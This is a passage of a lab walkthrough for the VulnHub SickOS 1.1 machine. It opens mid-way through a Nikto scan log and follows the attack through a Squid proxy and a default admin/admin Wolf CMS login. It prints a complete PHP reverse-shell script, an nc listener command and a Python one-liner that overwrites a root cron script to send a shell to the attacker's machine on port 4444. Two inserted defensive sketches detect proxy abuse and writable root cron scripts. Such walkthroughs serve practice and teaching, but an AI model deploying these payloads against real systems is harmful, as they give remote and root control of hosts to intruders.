+ OSVDB-3092: /gs/: This might be interesting... potential country code (South Georgia And The South Sandwich Islands)
+ OSVDB-3092: /es/: This might be interesting... potential country code (Spain)
+ OSVDB-3092: /lk/: This might be interesting... potential country code (Sri Lanka)
+ OSVDB-3092: /sd/: This might be interesting... potential country code (Sudan)
+ OSVDB-3092: /sr/: This might be interesting... potential country code (Suriname)
+ OSVDB-3092: /sj/: This might be interesting... potential country code (Svalbard And Jan Mayen)
+ OSVDB-3092: /sz/: This might be interesting... potential country code (Swaziland)
+ OSVDB-3092: /se/: This might be interesting... potential country code (Sweden)
+ OSVDB-3092: /ch/: This might be interesting... potential country code (Switzerland)
+ OSVDB-3092: /sy/: This might be interesting... potential country code (Syrian Arab Republic)
+ OSVDB-3092: /tw/: This might be interesting... potential country code (Taiwan)
+ OSVDB-3092: /tj/: This might be interesting... potential country code (Tajikistan)
+ OSVDB-3092: /tz/: This might be interesting... potential country code (United Republic Of Tanzania)
+ OSVDB-3092: /th/: This might be interesting... potential country code (Thailand)
+ OSVDB-3092: /tl/: This might be interesting... potential country code (Timor-leste)
+ OSVDB-3092: /tg/: This might be interesting... potential country code (Togo)
+ OSVDB-3092: /tk/: This might be interesting... potential country code (Tokelau)
+ OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
+ OSVDB-3092: /tt/: This might be interesting... potential country code (Trinidad And Tobago)
+ OSVDB-3092: /tn/: This might be interesting... potential country code (Tunisia)
+ OSVDB-3092: /tr/: This might be interesting... potential country code (Turkey)
+ OSVDB-3092: /tm/: This might be interesting... potential country code (Turkmenistan)
+ OSVDB-3092: /tc/: This might be interesting... potential country code (Turks And Caicos Islands)
+ OSVDB-3092: /tv/: This might be interesting... potential country code (Tuvalu)
+ OSVDB-3092: /ug/: This might be interesting... potential country code (Uganda)
+ OSVDB-3092: /ua/: This might be interesting... potential country code (Ukraine)
+ OSVDB-3092: /ae/: This might be interesting... potential country code (United Arab Emirates)
+ OSVDB-3092: /gb/: This might be interesting... potential country code (United Kingdom)
+ OSVDB-3092: /us/: This might be interesting... potential country code (United States)
+ OSVDB-3092: /um/: This might be interesting... potential country code (United States Minor Outlying Islands)
+ OSVDB-3092: /uy/: This might be interesting... potential country code (Uruguay)
+ OSVDB-3092: /uz/: This might be interesting... potential country code (Uzbekistan)
+ OSVDB-3092: /vu/: This might be interesting... potential country code (Vanuatu)
+ OSVDB-3092: /ve/: This might be interesting... potential country code (Venezuela)
+ OSVDB-3092: /vn/: This might be interesting... potential country code (Viet Nam)
+ OSVDB-3092: /vg/: This might be interesting... potential country code (British Virgin Islands)
+ OSVDB-3092: /vi/: This might be interesting... potential country code (U.S. Virgin Islands)
+ OSVDB-3092: /wf/: This might be interesting... potential country code (Wallis And Futuna)
+ OSVDB-3092: /eh/: This might be interesting... potential country code (Western Sahara)
+ OSVDB-3092: /ye/: This might be interesting... potential country code (Yemen)
+ OSVDB-3092: /zm/: This might be interesting... potential country code (Zambia)
+ OSVDB-3092: /zw/: This might be interesting... potential country code (Zimbabwe)
+ OSVDB-3092: /www/2: This might be interesting...
+ OSVDB-3093: /includes/sendmail.inc: Include files (.inc) should not be served in plain text.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ OSVDB-3092: /install.txt: Install file found may identify site software.
+ OSVDB-3092: /LICENSE.TXT: License file found may identify site software.
+ OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
+ /config/config.txt: Configuration file found.
+ /config/readme.txt: Readme file found.
+ /data/readme.txt: Readme file found.
+ /log/readme.txt: Readme file found.
+ /logs/readme.txt: Readme file found.
+ /uploads/readme.txt: Readme file found.
+ /admin1.php: Admin login page found.
+ /admin.asp: Admin login page/section found.
+ /admin/account.asp: Admin login page/section found.
+ /admin/account.html: Admin login page/section found.
+ /admin/account.php: Admin login page/section found.
+ /admin/controlpanel.asp: Admin login page/section found.
+ /admin/controlpanel.html: Admin login page/section found.
+ /admin/controlpanel.php: Admin login page/section found.
+ /admin/cp.asp: Admin login page/section found.
+ /admin/cp.html: Admin login page/section found.
+ /admin/cp.php: Admin login page/section found.
+ /admin/home.asp: Admin login page/section found.
+ /admin/home.php: Admin login page/section found.
+ /admin/index.asp: Admin login page/section found.
+ /admin/index.html: Admin login page/section found.
+ /admin/login.asp: Admin login page/section found.
+ /admin/login.html: Admin login page/section found.
+ /admin/login.php: Admin login page/section found.
+ /admin1.asp: Admin login page/section found.
+ /admin1.html: Admin login page/section found.
+ /admin1/: Admin login page/section found.
+ /admin2.asp: Admin login page/section found.
+ /admin2.html: Admin login page/section found.
+ /admin2.php: Admin login page/section found.
+ /admin4_account/: Admin login page/section found.
+ /admin4_colon/: Admin login page/section found.
+ /admincontrol.asp: Admin login page/section found.
+ /admincontrol.html: Admin login page/section found.
+ /admincontrol.php: Admin login page/section found.
+ /administer/: Admin login page/section found.
+ /administr8.asp: Admin login page/section found.
+ /administr8.html: Admin login page/section found.
+ /administr8.php: Admin login page/section found.
+ /administr8/: Admin login page/section found.
+ /administracao.php: Admin login page/section found.
+ /administraçao.php: Admin login page/section found.
+ /administracao/: Admin login page/section found.
+ /administraçao/: Admin login page/section found.
+ /administracion.php: Admin login page/section found.
+ /administracion/: Admin login page/section found.
+ /administrateur.php: Admin login page/section found.
+ /administrateur/: Admin login page/section found.
+ /administratie/: Admin login page/section found.
+ /administration.html: Admin login page/section found.
+ /administration.php: Admin login page/section found.
+ /administration/: Admin login page/section found.
+ /administrator.asp: Admin login page/section found.
+ /administrator.html: Admin login page/section found.
+ /administrator.php: Admin login page/section found.
+ /administrator/account.asp: Admin login page/section found.
+ /administrator/account.html: Admin login page/section found.
+ /administrator/account.php: Admin login page/section found.
+ /administrator/index.asp: Admin login page/section found.
+ /administrator/index.html: Admin login page/section found.
+ /administrator/index.php: Admin login page/section found.
+ /administrator/login.asp: Admin login page/section found.
+ /administrator/login.html: Admin login page/section found.
+ /administrator/login.php: Admin login page/section found.
+ /administratoraccounts/: Admin login page/section found.
+ /administrators/: Admin login page/section found.
+ /administrivia/: Admin login page/section found.
+ /adminisztrátora.php: Admin login page/section found.
+ /adminisztrátora/: Admin login page/section found.
+ /adminpanel.asp: Admin login page/section found.
+ /adminpanel.html: Admin login page/section found.
+ /adminpanel.php: Admin login page/section found.
+ /adminpro/: Admin login page/section found.
+ /admins.asp: Admin login page/section found.
+ /admins.html: Admin login page/section found.
+ /admins.php: Admin login page/section found.
+ /admins/: Admin login page/section found.
+ /AdminTools/: Admin login page/section found.
+ /amministratore.php: Admin login page/section found.
+ /amministratore/: Admin login page/section found.
+ /autologin/: Admin login page/section found.
+ /banneradmin/: Admin login page/section found.
+ /bbadmin/: Admin login page/section found.
+ /beheerder.php: Admin login page/section found.
+ /beheerder/: Admin login page/section found.
+ /bigadmin/: Admin login page/section found.
+ /blogindex/: Admin login page/section found.
+ /cadmins/: Admin login page/section found.
+ /ccms/: Admin login page/section found.
+ /ccms/index.php: Admin login page/section found.
+ /ccms/login.php: Admin login page/section found.
+ /ccp14admin/: Admin login page/section found.
+ /cmsadmin/: Admin login page/section found.
+ /configuration/: Admin login page/section found.
+ /configure/: Admin login page/section found.
+ /controlpanel.asp: Admin login page/section found.
+ /controlpanel.html: Admin login page/section found.
+ /controlpanel.php: Admin login page/section found.
+ /controlpanel/: Admin login page/section found.
+ /cp.asp: Admin login page/section found.
+ /cp.html: Admin login page/section found.
+ /cp.php: Admin login page/section found.
+ /cpanel_file/: Admin login page/section found.
+ /customer_login/: Admin login page/section found.
+ /database_administration/: Admin login page/section found.
+ /Database_Administration/: Admin login page/section found.
+ /dir-login/: Admin login page/section found.
+ /directadmin/: Admin login page/section found.
+ /ezsqliteadmin/: Admin login page/section found.
+ /fileadmin.asp: Admin login page/section found.
+ /fileadmin.html: Admin login page/section found.
+ /fileadmin.php: Admin login page/section found.
+ /formslogin/: Admin login page/section found.
+ /globes_admin/: Admin login page/section found.
+ /hpwebjetadmin/: Admin login page/section found.
+ /Indy_admin/: Admin login page/section found.
+ /irc-macadmin/: Admin login page/section found.
+ /LiveUser_Admin/: Admin login page/section found.
+ /login_db/: Admin login page/section found.
+ /login-redirect/: Admin login page/section found.
+ /login-us/: Admin login page/section found.
+ /login.asp: Admin login page/section found.
+ /login.html: Admin login page/section found.
+ /login.php: Admin login page/section found.
+ /login1/: Admin login page/section found.
+ /loginflat/: Admin login page/section found.
+ /logo_sysadmin/: Admin login page/section found.
+ /Lotus_Domino_Admin/: Admin login page/section found.
+ /macadmin/: Admin login page/section found.
+ /maintenance/: Admin login page/section found.
+ /manuallogin/: Admin login page/section found.
+ /memlogin/: Admin login page/section found.
+ /meta_login/: Admin login page/section found.
+ /modelsearch/login.asp: Admin login page/section found.
+ /modelsearch/login.php: Admin login page/section found.
+ /moderator.asp: Admin login page/section found.
+ /moderator.html: Admin login page/section found.
+ /moderator.php: Admin login page/section found.
+ /moderator/: Admin login page/section found.
+ /moderator/admin.asp: Admin login page/section found.
+ /moderator/admin.html: Admin login page/section found.
+ /moderator/admin.php: Admin login page/section found.
+ /moderator/login.asp: Admin login page/section found.
+ /moderator/login.html: Admin login page/section found.
+ /moderator/login.php: Admin login page/section found.
+ /myadmin/: Admin login page/section found.
+ /navSiteAdmin/: Admin login page/section found.
+ /newsadmin/: Admin login page/section found.
+ /openvpnadmin/: Admin login page/section found.
+ /painel/: Admin login page/section found.
+ /panel/: Admin login page/section found.
+ /pgadmin/: Admin login page/section found.
+ /phpldapadmin/: Admin login page/section found.
+ /phppgadmin/: Admin login page/section found.
+ /phpSQLiteAdmin/: Admin login page/section found.
+ /platz_login/: Admin login page/section found.
+ /power_user/: Admin login page/section found.
+ /project-admins/: Admin login page/section found.
+ /pureadmin/: Admin login page/section found.
+ /radmind-1/: Admin login page/section found.
+ /radmind/: Admin login page/section found.
+ /rcLogin/: Admin login page/section found.
+ /server_admin_small/: Admin login page/section found.
+ /Server.asp: Admin login page/section found.
+ /Server.html: Admin login page/section found.
+ /Server.php: Admin login page/section found.
+ /ServerAdministrator/: Admin login page/section found.
+ /showlogin/: Admin login page/section found.
+ /simpleLogin/: Admin login page/section found.
+ /smblogin/: Admin login page/section found.
+ /sql-admin/: Admin login page/section found.
+ /ss_vms_admin_sm/: Admin login page/section found.
+ /sshadmin/: Admin login page/section found.
+ /staradmin/: Admin login page/section found.
+ /sub-login/: Admin login page/section found.
+ /Super-Admin/: Admin login page/section found.
+ /support_login/: Admin login page/section found.
+ /sys-admin/: Admin login page/section found.
+ /sysadmin.asp: Admin login page/section found.
+ /sysadmin.html: Admin login page/section found.
+ /sysadmin.php: Admin login page/section found.
+ /sysadmin/: Admin login page/section found.
+ /SysAdmin/: Admin login page/section found.
+ /SysAdmin2/: Admin login page/section found.
+ /sysadmins/: Admin login page/section found.
+ /system_administration/: Admin login page/section found.
+ /system-administration/: Admin login page/section found.
+ /ur-admin.asp: Admin login page/section found.
+ /ur-admin.html: Admin login page/section found.
+ /ur-admin.php: Admin login page/section found.
+ /ur-admin/: Admin login page/section found.
+ /useradmin/: Admin login page/section found.
+ /UserLogin/: Admin login page/section found.
+ /utility_login/: Admin login page/section found.
+ /v2/painel/: Admin login page/section found.
+ /vadmind/: Admin login page/section found.
+ /vmailadmin/: Admin login page/section found.
+ /webadmin.asp: Admin login page/section found.
+ /webadmin.html: Admin login page/section found.
+ /webadmin.php: Admin login page/section found.
+ /webmaster/: Admin login page/section found.
+ /websvn/: Admin login page/section found.
+ /wizmysqladmin/: Admin login page/section found.
+ /wp-admin/: Admin login page/section found.
+ /wordpresswp-admin/: Admin login page/section found.
+ /wp-login/: Admin login page/section found.
+ /wordpresswp-login/: Admin login page/section found.
+ /xlogin/: Admin login page/section found.
+ /yonetici.asp: Admin login page/section found.
+ /yonetici.html: Admin login page/section found.
+ /yonetici.php: Admin login page/section found.
+ /yonetim.asp: Admin login page/section found.
+ /yonetim.html: Admin login page/section found.
+ /yonetim.php: Admin login page/section found.
+ OSVDB-3092: /test.asp: This might be interesting...
+ OSVDB-3092: /test.aspx: This might be interesting...
+ OSVDB-3092: /test.php: This might be interesting...
+ /maintenance.asp: This might be interesting...
+ /maintenance.aspx: This might be interesting...
+ /maint/: This might be interesting...
+ /maint.asp: This might be interesting...
+ /maint.aspx: This might be interesting...
+ OSVDB-59440: /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml: VMWare ESX is vulnerable to a directory traversal attack.
+ /jk-status: mod_jk status page is visible.
+ /balancer-manager: mod_proxy_balancer management page is visible.
+ /servlets-examples/: Tomcat servlets examples are visible.
+ /admin-console: JBoss admin console is visible.
+ /help.php: A help file was found.
+ /gif/hp_invent_logo.gif: This device may be an HP printer/scanner and allow retrieval of previously scanned images.
+ /gif/tricolor_ink_guage.gif: This device may be an HP printer/scanner and allow retrieval of previously scanned images.
+ OSVDB-3092: /messages/: This might be interesting...
+ OSVDB-3092: /cms/: This might be interesting...
+ OSVDB-3092: /helpdesk/: This might be interesting...
+ /3rdparty/phpMyAdmin/: phpMyAdmin directory found
+ /phpMyAdmin/: phpMyAdmin directory found
+ /3rdparty/phpmyadmin/: phpMyAdmin directory found
+ /phpmyadmin/: phpMyAdmin directory found
+ /pma/: phpMyAdmin directory found
+ /spin/main.csp: CA iTechnology SPIN interface found
+ /openadmin/: Informix OpenAdmin tool administration login
+ OSVDB-3092: /.svn/entries: Subversion Entries file may contain directory listing information.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ OSVDB-3092: /.hg/dirstate: Mercurial DirState file may contain directory listing information.
+ OSVDB-3092: /test.jsp: This might be interesting...
+ /mobileadmin/db/MobileAdminDB.sqlite: RoveIT Mobile Admin internal database is available for download
+ /notes.txt: This might be interesting...
+ OSVDB-3092: /exception.php: PHP Exceptions File
+ /adfs/ls/?wa=wsignout1.0: Active Directory Federation Services sign out page found.
+ /adfs/ls/?wa=wsignin1.0&wtrealm=http://www.cirt.net/: Active Directory Federation Services sign in page found.
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /jk-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /jk-status/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /admin/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /host-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ OSVDB-96181: /adfs/services/proxytrustpolicystoretransfer: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/fs/federationserverservice.asmx: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/samlprotocol/proxytrust: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/mexsoap: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/proxymexhttpget/: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/proxymex: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/windowstransport: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/certificatemixed: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/certificatetransport: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/usernamemixed: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/kerberosmixed: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/issuedtokenmixedasymmetricbasic256: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/2005/issuedtokenmixedsymmetricbasic256: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/13/kerberosmixed: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/13/certificatemixed: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/13/usernamemixed: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/13/issuedtokenmixedasymmetricbasic256: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/13/issuedtokenmixedsymmetricbasic256: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trusttcp/windows: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/proxytrust: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/proxytrust13: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/proxytrustprovisionusername: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/services/trust/proxytrustprovisionissuedtoken: Active Directory Federation Services page found.
+ OSVDB-96181: /FederationMetadata/2007-06/: Active Directory Federation Services page found.
+ OSVDB-96181: /Federationmetadata/2007-06/FederationMetadata.xml: Active Directory Federation Services page found.
+ OSVDB-96181: /adfs/ls/IdpInitiatedSignon.aspx: Active Directory Federation Services page found.
+ /console/: Application console found
+ 7917 requests: 0 error(s) and 2170 item(s) reported on remote host
+ End Time: 2021-10-24 02:40:22 (GMT-4) (24 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

As I am the lazy one in our group, I just went on with dirb to make some sense out of this mess.

Dirb

And here I actually made the mistake of going to the IP address in the browser without any proxy.

The Rabbit Hole (You can ignore this section if you want to…)

These are the results I got, and I initially thought I might need a VPN to get access to these URLs. I actually wasted a lot of time the following day trying to come up with some way to pass through it.

That didn't happen, so here is what I did to get out of the rabbit hole: just go to some place nice, eat a load and come back (or just order something nice for yourself online, whatever you prefer). And yeah, that worked quite well for me, because I was finally able to get the idea of using the proxy to bypass the invalid URL.

Firefox proxy

Scroll down to the bottom,

Choose Manual proxy and fill in HTTP Proxy with the IP address of the target machine and port 3128.
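What this proxy hop looks like from the defender's side, as an added example that is not part of the original write-up: the sketch reads Squid `access.log` lines in the native format and flags requests whose destination is loopback or one of the proxy host's own addresses. The log lines are constructed, and the function names and the `proxy_addrs` parameter are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample lines in Squid's native access.log layout:
# time elapsed client result/status bytes method URL ident hierarchy/peer type
SAMPLE_LOG = """\
1635057598.101     12 192.168.162.128 TCP_MISS/200 3021 GET http://192.168.162.129/ - DIRECT/192.168.162.129 text/html
1635057601.442      9 192.168.162.128 TCP_MISS/200 412 GET http://127.0.0.1/robots.txt - DIRECT/127.0.0.1 text/plain
1635057610.007    230 192.168.162.50 TCP_MISS/200 15873 GET http://example.org/index.html - DIRECT/93.184.216.34 text/html
1635057615.930      3 192.168.162.128 TCP_DENIED/403 3650 CONNECT localhost:22 - NONE/- text/html
this line is truncated
"""

def destination_host(method, url):
    """Return the host part of a logged request target."""
    if method == "CONNECT":            # CONNECT logs "host:port", no scheme
        return url.rsplit(":", 1)[0].strip("[]")
    try:
        return urlsplit(url).hostname or ""
    except ValueError:                 # malformed URL in the log
        return ""

def is_internal(host, own_addrs):
    """True if host is loopback, 'localhost', or an address the proxy itself owns."""
    if host.lower() == "localhost":
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False                   # other hostnames would need DNS; out of scope
    return addr.is_loopback or addr in own_addrs

def flag_internal_requests(log_text, proxy_addrs):
    """Return (client, method, url, result) for requests aimed back at the proxy host."""
    own = {ipaddress.ip_address(a) for a in proxy_addrs}
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue                   # skip malformed or truncated lines
        client, result, method, url = fields[2], fields[3], fields[5], fields[6]
        if is_internal(destination_host(method, url), own):
            hits.append((client, method, url, result))
    return hits

if __name__ == "__main__":
    for hit in flag_internal_requests(SAMPLE_LOG, ["192.168.162.129"]):
        print(*hit)
```

In `squid.conf` the matching control is a `dst` ACL covering loopback and the proxy's own addresses, with an `http_access deny` rule for it placed ahead of any allow rule.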

Website

Okay!! Well, I also checked the source code and found nothing interesting there, so I won’t bother you with those details. Let’s just move on, okay…

Going through the URLs

From the output of dirb, we get to know different URLs we might be interested in, so let’s go through them one by one.

cgi-bin and server status

These two gave us a 403 error, so there is no need to go through them. Let’s continue with the others.

connect

Hmmm!! So some python code working on the server, okay not a bad thing let’s save it for later.

index and index.php

As the name suggests, it just contains the index page of the website, nothing to see here!!

robots and robots.txt

Here, actually we got something of interest,

So we have wolfcms to try out, and let’s hope it has anonymous file upload so that we can get a shell.

/wolfcms

Okay, so we don’t have the anonymous file upload we were hoping for, but at least we can try to login as administrator. We have a lot of tools to brute force that login. Well the funny part is I didn’t use any tool at all. No I am not a script kiddie, I just typed out admin;admin before trying out the tools.

Funny!! that was the valid credential and I don’t know how to add emojis here. Please someone tell me.

Username — admin

Password — admin

Login as administrator and file upload

So, as expected, we can upload files here, even malicious code to get a shell.

So, here is the website where I found the PHP code to proceed with. (Well yeah I am a script kiddie, so what!! I am still learning.)

Download the tar file, unzip it and upload the file as an article on the website.

Code

<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.162.128'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0); // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
    0 => array("pipe", "r"), // stdin is a pipe that the child will read from
    1 => array("pipe", "w"), // stdout is a pipe that the child will write to
    2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}

?>

Just make the necessary changes on lines 4 and 5 and paste the code as an article as described in the picture above.

Go to the terminal and start a netcat listener on the port you set in the script. Refresh the page and you are good to go.

$ nc -nvlp 1234

Getting the www-data access

Voilà, got the www-data access.

Here, after looking at the contents of config.php, I got to know that the root password is john@123, but I wasn’t able to su into root.

So let’s try out something different.

Here, we again get the connect.py script. Something fishy is going on here. And yes, I was right: after looking at the crontab of this machine, I got to know that the connect.py script is being executed on every refresh. So, an easier way would be to just replace the content of the script to get a root access reverse shell to the machine.

Now it’s the time for privilege escalation.

Getting root access

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.162.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /var/www/connect.py

Simple. Well, this one I wrote as I am quite good at Python. Easy to understand: just a socket connection to our machine through port 4444.

Refresh the webpage!!

And yes finally we got the ROOT privilege.
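The root cause of this escalation is a root cron job running a script that a lower-privileged account can rewrite. The audit below is an added example, not part of the original write-up: it parses system-crontab text and reports scripts run as root whose file or parent directory is writable by anyone other than trusted owners. The crontab line in it is constructed (the write-up does not show the real entry), and all function names are assumptions.

```python
import os
import stat

def parse_system_crontab(text):
    """Yield (user, argv) from /etc/crontab or /etc/cron.d style text."""
    for raw in text.splitlines():
        fields = raw.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue                      # blank, comment, or VAR=value line
        n = 1 if fields[0].startswith("@") else 5   # @reboot etc. vs 5 time fields
        if len(fields) >= n + 2:
            yield fields[n], fields[n + 1:]

def weak_permissions(path, trusted_uids):
    """Return the reasons why someone outside trusted_uids could modify path."""
    st = os.stat(path)
    reasons = []
    if st.st_uid not in trusted_uids:
        reasons.append("owned by uid %d" % st.st_uid)
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    # A sticky world-writable directory (like /tmp) does not let users replace
    # files they do not own, so it is not reported as world-writable.
    sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
    if st.st_mode & stat.S_IWOTH and not sticky_dir:
        reasons.append("world-writable")
    return reasons

def audit_root_jobs(cron_text, trusted_uids=frozenset({0})):
    """Return (script, weak_path, reasons) for every root job that runs a weak file."""
    findings = []
    for user, argv in parse_system_crontab(cron_text):
        if user != "root":
            continue
        for tok in argv:
            if not (tok.startswith("/") and os.path.isfile(tok)):
                continue                  # only absolute paths that exist on disk
            # A writable parent directory allows the file to be swapped out.
            for target in (tok, os.path.dirname(tok)):
                reasons = weak_permissions(target, trusted_uids)
                if reasons:
                    findings.append((tok, target, reasons))
    return findings

if __name__ == "__main__":
    # Constructed entry; the write-up does not show the target's actual crontab line.
    sample = "* * * * * root /usr/bin/python /var/www/connect.py\n"
    for script, target, reasons in audit_root_jobs(sample):
        print(script, target, ", ".join(reasons))
```

On a real host, feed it the contents of `/etc/crontab` and each file under `/etc/cron.d`; every finding should be fixed by making the script and its directory root-owned and not group- or world-writable.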

It was a good experience, and well, I tried to go through it manually, without using the Metasploit framework, because according to some YouTube videos, OSCP allows only a limited number of Metasploit sessions. I don’t know, I haven’t completed my OSCP yet; well, I am trying to prepare for it. So, better to just get some practice of this before it’s too late. And I will reference some blogs which used Metasploit to get the access; they are really nice to read as well. They helped me a lot while getting the idea of privilege escalation.

Thanks for reading!!

Reference

  1. https://www.vulnhub.com/entry/sickos-11,132/
  2. https://jhalon.github.io/vulnhub-sick-os1/
  3. https://medium.com/@uzmakin495/sickos-1-1-walkthrough-vulnhub-286a7f5fcb85
  4. https://medium.com/infosec-adventures/sickos-1-1-walkthrough-8b0f206c5b7a
  5. https://highon.coffee/blog/sickos-1-walkthrough/
  6. https://alphacybersecurity.tech/sickos-1-1-walk-through/
  7. https://mattgeraldcomputingjourney.wordpress.com/2019/12/04/sickos-1-1-walkthrough/
